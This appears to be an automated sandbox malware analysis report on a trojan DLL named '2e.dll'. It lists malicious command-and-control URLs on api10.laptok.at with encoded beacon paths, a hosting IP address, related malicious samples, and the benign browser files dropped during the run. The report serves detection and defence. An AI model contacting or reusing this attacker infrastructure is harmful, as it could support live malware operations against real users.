http://api10.laptok.at/favicon.ico	true	Avira URL Cloud: safe	unknown
http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	2e.dll	false	URL Reputation: safe	unknown
http://www.nytimes.com/	msapplication.xml3.15.dr	false		high
http://ocsp.sectigo.com0	2e.dll	false	URL Reputation: safe	unknown
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5a	{DD28BAED-2779-11EC-90EB-ECF4BBEA1588}.dat.21.dr, ~DFB9EDA9C4DE41A518.TMP.21.dr	true	Avira URL Cloud: safe	unknown
http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tX	{C2243AEB-2779-11EC-90EB-ECF4BBEA1588}.dat.15.dr	true	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	2e.dll	false	URL Reputation: safe	unknown
http://www.youtube.com/	msapplication.xml7.15.dr	false		high
https://sectigo.com/CPS0D	2e.dll	false	URL Reputation: safe	unknown
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1P	loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.wikipedia.com/	msapplication.xml6.15.dr	false	URL Reputation: safe	unknown
http://www.amazon.com/	msapplication.xml.15.dr	false		high
http://www.live.com/	msapplication.xml2.15.dr	false		high
http://www.reddit.com/	msapplication.xml4.15.dr	false		high
http://www.twitter.com/	msapplication.xml5.15.dr	false		high
http://www.google.com/	msapplication.xml1.15.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.106.18.141	api10.laptok.at	Germany		8560	ONEANDONE-ASBrauerstrasse48DE	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	498882
Start date:	07.10.2021
Start time:	16:18:46
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 53s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	2e.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.winDLL@11/19@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 41% (good quality ratio 39.7%) Quality average: 80% Quality standard deviation: 27.2%
HCA Information:	Successful, ratio: 71% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 95.100.218.79, 20.82.210.154, 20.54.110.249, 2.20.178.10, 2.20.178.56, 40.112.88.60, 104.94.89.6, 2.20.178.33, 2.20.178.24, 152.199.19.161 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
87.106.18.141	a3.exe	Get hash	malicious	Browse	api5.feen007.at/favicon.ico
	a04.dll	Get hash	malicious	Browse	app10.laptok.at/favicon.ico
	50.dll	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	chat.allager.at/jvassets/xI/t64.dat
	http://far.gaploop.at/api1/m9Nm6sQ5MZ2/kV1dHuUchwgj0p/w9B514uuWuNRu_2Fovw1B/iJjn_2FjOcMhSdO6/hY1viFbhIYH_2BS/FrMYbmCHgkAwm_2Btu/e29igvEBi/gLOHtqdBI_2B3sibC3Cg/z_2F8IFoCH_2BWJVdUY/ri7hwzyuAx2q5RHXJmbXhc/ygopWPWJKwti5/IOOS1u46/4ZXFc4Ok4SPekiO7ot2QyT_/2FJdMyYfAP/7FTqw0rQZL_2B1pan/wh8ruTp3dham/UlLIzAZ_2Fn/esHGZHp93qljV_/0A_0DvFEgD08oveRu1RDL/3nPBhZLduxccr2_2/FS5iRLSxGBo44/0xUc	Get hash	malicious	Browse	far.gaploop.at/api1/m9Nm6sQ5MZ2/kV1dHuUchwgj0p/favicon.ico
	4EyIHmLYEBBs.vbs	Get hash	malicious	Browse	chat.allager.at/jvassets/xI/t64.dat

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api10.laptok.at	50.dll	Get hash	malicious	Browse	87.106.18.141
	11.dll	Get hash	malicious	Browse	35.228.184.80
	documentation_27396.vbs	Get hash	malicious	Browse	35.189.93.117
	info_70397.vbs	Get hash	malicious	Browse	35.189.93.117
	SecuriteInfo.com.Win32.Kryptik.HJSQ.12709.dll	Get hash	malicious	Browse	35.189.93.117
	SecuriteInfo.com.Trojan.Win32.Save.a.30469.dll	Get hash	malicious	Browse	35.189.93.117
	22.dll	Get hash	malicious	Browse	34.65.108.95
	2200.dll	Get hash	malicious	Browse	34.65.108.95
	urban.dll	Get hash	malicious	Browse	34.65.25.23
	SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll	Get hash	malicious	Browse	34.65.15.6
	SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll	Get hash	malicious	Browse	34.65.144.159
	SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Get hash	malicious	Browse	34.65.144.159
	SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll	Get hash	malicious	Browse	34.65.144.159
	NJPcHPuRcG.dll	Get hash	malicious	Browse	34.65.144.159
	Ne6A4k8vK6.dll	Get hash	malicious	Browse	34.65.144.159
	File_78476.xlsb	Get hash	malicious	Browse	35.228.31.40
	u8xtCk7fq8.dll	Get hash	malicious	Browse	35.228.31.40
	2200.dll	Get hash	malicious	Browse	35.228.31.40
	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Get hash	malicious	Browse	35.228.31.40
	Attached_File_898318.xlsb	Get hash	malicious	Browse	35.228.31.40

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ONEANDONE-ASBrauerstrasse48DE	a3.exe	Get hash	malicious	Browse	87.106.18.141
	a04.dll	Get hash	malicious	Browse	87.106.18.141
	50.dll	Get hash	malicious	Browse	87.106.18.141
	Quote -0071021.exe	Get hash	malicious	Browse	217.160.0.7
	DHL SHIPMENT.HTML	Get hash	malicious	Browse	217.160.0.196
	hwIILTIn0n.exe	Get hash	malicious	Browse	217.160.0.17
	just.exe	Get hash	malicious	Browse	212.227.15.158
	2WK7SGkGVZ.exe	Get hash	malicious	Browse	74.208.236.156
	0n1pEFuGKC.exe	Get hash	malicious	Browse	74.208.236.145
	VmbABLKNbD.exe	Get hash	malicious	Browse	74.208.236.108
	Update-KB250-x86.exe	Get hash	malicious	Browse	74.208.5.20
	Update-KB2984-x86.exe	Get hash	malicious	Browse	74.208.5.20
	justifi4c.exe	Get hash	malicious	Browse	213.165.67.118
	CY2075400.exe	Get hash	malicious	Browse	213.165.67.115
	Justificante de la transfer.exe	Get hash	malicious	Browse	212.227.15.142
	IMAGE1001.exe	Get hash	malicious	Browse	213.165.67.115
	Exq3dXFDHe.exe	Get hash	malicious	Browse	217.160.0.243
	MIN8gr0eOj.exe	Get hash	malicious	Browse	74.208.236.228
	solicitud de presupuesto.exe	Get hash	malicious	Browse	217.160.0.21
	Payment Requisition October 4.xlsx	Get hash	malicious	Browse	74.208.236.226

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C2243AE9-2779-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7694526431217736
Encrypted:	false
SSDEEP:	48:Iw/Gcpr2GwpLuG/ap8fGIpcMGvnZpvoGobPqp9oGo4fhzpmLGWb5nTpUGWb7T6p7:rVZuZM2hWVtqif7fhzMZZ66stBXapB
MD5:	5F38D3B6CD6DCB6133FA4568E8AFA2C1
SHA1:	40AF099DED37781639FB476F50B7FA65474684F8
SHA-256:	EDA9AA7EFFFAFA29ED90217E21192761860F29B9C58D06A282F84FF25E364D81
SHA-512:	DCE00F5DFEE4685E46E7279E46534B706D039A57F70ED6C8D0516EBA3C25261AB3AE805E6D0CE90C2064FC6B7FC68F063B24632DEFEDDF418206B913BE879279
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DD28BAEB-2779-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7698468890647774
Encrypted:	false
SSDEEP:	96:rLZIZp29WctMxifH4x2xzMLxOxbx65xSxB0xbxpB:rLZIZp29WctoifHkmzMleV6/yBwVpB
MD5:	4E3474B49787A29BDCA2DF6CE06599A9
SHA1:	85F0E57BB0A9F59BB65E8992F13EE3A672A10B30
SHA-256:	AEE2DF902E7ACEC926E03297FD67BA8762CCBCA7A6E81A28B23F240D8E6E9351
SHA-512:	B5D212E7789BC193D358E2E27100AA4294FAAF8263F3DC4AA539FC052D4F5E7B8D7A24A706C33E7F4B32B55533F9E93E72C4DC50DB01CAAD3C9CF03C65C40045
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C2243AEB-2779-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28168
Entropy (8bit):	1.924630739251775
Encrypted:	false
SSDEEP:	96:reZxQe6oBSppHjN2NW2M6B9Zaq5AXX2l9TMZaq5AX6A:reZxQe6okppHjN2NW2M6BmqK2l7qKKA
MD5:	76B2F71618816F746BE6A756E61D9574
SHA1:	298CE55345D46FE76B74C3836C619BA98579BCCC
SHA-256:	12D79A99EA47B29192AE132004E1470A34B757EA63D7FF7F9C1720739D5B3F92
SHA-512:	7BFB42F2DCB48FAD6D7EE357759E1B97648C726CB52E01726B437EDF22EB83EBFEE54742C9E9CD0FA3C92F242652879412373F860E7C382254EFB45F6CCEAF12
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DD28BAED-2779-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28128
Entropy (8bit):	1.9149036050589494
Encrypted:	false
SSDEEP:	96:rHZsQ06qBSJjN2mWLMLpfYKkgm/SVYK7Kkgm/HA:rHZsQ06qkJjN2mWLMLpfYxaVY+xfA
MD5:	B0E31D8A8F80E5107F50E167D5F64CE3
SHA1:	B0F568C02F3B875C2B009C74F82E138F0495E4EB
SHA-256:	31C9F99F030865BFF0AFA9D658003A6E0FEDB2763C8C69BC23C7B66B549EABA8
SHA-512:	0E42904AC4580536C9B1630693AB4DA87A284791AF546C4E5AB73CD4CA22B65F069A84437DCE7A866A3FC80253F3ACAFE352E0DF364C1AA81C59F77BB18D5766
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.116265607751289
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEiUzUzCnWimI002EtM3MHdNMNxOEiUzUzCnWimI00OYGVbkEtMb:2d6NxOY42SZHKd6NxOY42SZ7YLb
MD5:	B9289B02F73BA2696CE382F25B252768
SHA1:	34866CE7763DD1439472F01A062BAF1DE35AB40C
SHA-256:	02DCEC0FD7F8268958B6D9D1E629E45AF6E498A20E23BBF3961F8FA57936A67F
SHA-512:	4A45B4EACD678F305CCA348D948A363DDA19067A69ED083546F34660CEE816D16A282FD16D443C56B3BA01E0FC0896CB96D3CE6B37F79B70F309F8525B3A4B47
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.147158389776371
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kCOsCnWimI002EtM3MHdNMNxe2kCOsCnWimI00OYGkak6EtMb:2d6NxrYSZHKd6NxrYSZ7Yza7b
MD5:	0E2824AEBA5263BDBEB6F6C1B697201D
SHA1:	249FBF817F78E7030D4B51FF1C2D596003F7B022
SHA-256:	EF74B42C008153CAFE31A10A9B1518ECE461BB8BF3D605C275494097EF10048A
SHA-512:	E87F7261B11064B1A71AA98D4E9A69F97B5A86EEFA88A6B7A737BEA763C6A2691188E4AACEF19AFBD3F2158953F3906F2189F59D01F2FB4F753C7B84A0B07BB6
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.136384701855738
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLiUzUzCnWimI002EtM3MHdNMNxvLiUzUzCnWimI00OYGmZEtMb:2d6NxvL42SZHKd6NxvL42SZ7Yjb
MD5:	D6293B418E61C0E16419449C7AEC6137
SHA1:	CDE20431F39715389797994CD61049E6FBE3A812
SHA-256:	60DE51742FA97CEBA37658D67BFE11E8B1A4B2E4724BAA33427799ACB59CA0C2
SHA-512:	E4789D2CBF3925E4A89D4971446CF2D9C8023DEBFB6AA50EA1B7E85F8FA120A765593665D3DFBE2816DBFE4DE4D3C0534F52F09325E24498134F36E8ABF39CD2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.135109105672943
Encrypted:	false
SSDEEP:	12:TMHdNMNxiCOsCnWimI002EtM3MHdNMNxiCOsCnWimI00OYGd5EtMb:2d6NxeSZHKd6NxeSZ7YEjb
MD5:	2FD98F3ADDA3603CF1D1F96647FA06CA
SHA1:	4CC088DFA5CA39E3A41FA12080CAF29D9C809506
SHA-256:	D6EF9422DFD69F0913DA2E7245F967B8577CA90D71E5F9ADE29B62531EAC4833
SHA-512:	12050C0FBA5A7134104DC4EC634E29A8085D5FA401FDB22A649C25E863568CDB17E787390263B521D5E1FF5E70C8D9B4A8ABF5C1BF9BAA4FAE350727A1EF4E86
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.142854959846915
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwiUzUzCnWimI002EtM3MHdNMNxhGwiUzUzCnWimI00OYG8K075EtMb:2d6NxQE42SZHKd6NxQE42SZ7YrKajb
MD5:	8D563F07516320E95AE089BBC291A6EB
SHA1:	22E510ABFCDC78066565F209B5D9E3BC7C7B64FB
SHA-256:	70549C4B108CAED8AAC5664A94774E3B2B9204B65EB0C214A62D743B35E915F3
SHA-512:	03BAD30FA86E3C97DDE165CD7FF5E7AC23D8D75FC77DE706E84EB12CADD2A9CCE1FC838BE6C3875EDC5D0E211E3795D30A098449FC84C8D1CF55F561B328865F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.12013045220898
Encrypted:	false
SSDEEP:	12:TMHdNMNx0niUzUzCnWimI002EtM3MHdNMNx0niUzUzCnWimI00OYGxEtMb:2d6Nx0342SZHKd6Nx0342SZ7Ygb
MD5:	5797054F1BF80218E67B8EB13BA79DCC
SHA1:	117B6C85528CB5FDED08DC064E3C34B5FC0F027A
SHA-256:	AB40749924948AFD3098C35DA1B5DA3965D24B16ED2A5BE721E0FDE3943424D8
SHA-512:	A3B9E863A17DB97FE8E29C4955CC42B0B47835C5BE86F9E31A796725CE2773B78C34EB2912634A39D87940B5580E424050C953DA697984F7C42F89956BEBBD47
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.158929528907078
Encrypted:	false
SSDEEP:	12:TMHdNMNxxCOsCnWimI002EtM3MHdNMNxxCOsCnWimI00OYG6Kq5EtMb:2d6NxPSZHKd6NxPSZ7Yhb
MD5:	DDEEB8CBF6C19764CC86C0C33580C3CD
SHA1:	84D9A085AD938C9692A7717DCFCDFF116D01B047
SHA-256:	02EC86E92A9BCE56B88199A7971994C681973BFA4FEDBEF43ECF2EBFD09C7B60
SHA-512:	4D628D541CA0C8AA53F4F052F565FFB1CB7BE09D3A007F207E13A8ED7A54B7787F5B410D144B6E7F6E1382A8B25D7F7C13DC49F30EC9F74C5DAFA84034EFFE72
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.129267751681902
Encrypted:	false
SSDEEP:	12:TMHdNMNxcCOsCnWimI002EtM3MHdNMNxcCOsCnWimI00OYGVEtMb:2d6NxASZHKd6NxASZ7Ykb
MD5:	9D5AC7B16558A6CC28492AC28E1454F3
SHA1:	05928854C329AA44A0871B6A88BEFB7BF57177D6
SHA-256:	A7215397C2A465C7AE54EFBCA71E60373B5C31074B2700BF490D93227D02BE95
SHA-512:	EBCCCA5DBAD89FA75EAF1791B2E4243EEB7F29812A5B73DF8E10664CEEC6BF43392DADD531FD3EA5D9E7468A79FBE18767F6C9E5ADC7D5E6939B8D7F034760BD
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.1202160243666865
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnCOsCnWimI002EtM3MHdNMNxfnCOsCnWimI00OYGe5EtMb:2d6Nx9SZHKd6Nx9SZ7YLjb
MD5:	10D82FAC8F0A69FB555E9811B2D0A6E3
SHA1:	CB719FACB674AC7851A920127EA1A4E8ADC3DB6D
SHA-256:	3606FA33CA1ED25B52554EE60670FE6BB14E4461ADCB76415E6C339A63F468F2
SHA-512:	C9CBBEB850EFDB0FE4AB85CD32C960A2191A5190CA31919FCB8F358BE3B79C9A7BFFF1AA55594476CBC44B2425C2247515B5BC4E76DA5B8E6F0D4DBF26D6722E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.411614364643764
Encrypted:	false
SSDEEP:	3:oVXUYzbUrWqAW8JOGXnEYzbUrWgn:o9UYzwrl9qEYzwrv
MD5:	00ECA81511259FF58F097AA3701BB729
SHA1:	E002895091FC5D9EF7461950886E9ABBD71AC219
SHA-256:	09C86668E713E5ECC72A8478CF3FBD049B94AD6C777B7708C883CDA92240BCCF
SHA-512:	ABCDA1E47CDCCE103C95F860A5ABD550AF0EA8E07C26C5301D16B5E2260D972FC0757B4547A0D53EDC709CDFF1EFD10643BBABA258E882ADF79427694FD4FA64
Malicious:	false
Preview:	[2021/10/07 16:21:31.574] Latest deploy version: ..[2021/10/07 16:21:31.574] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF302033FC2C26A542.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
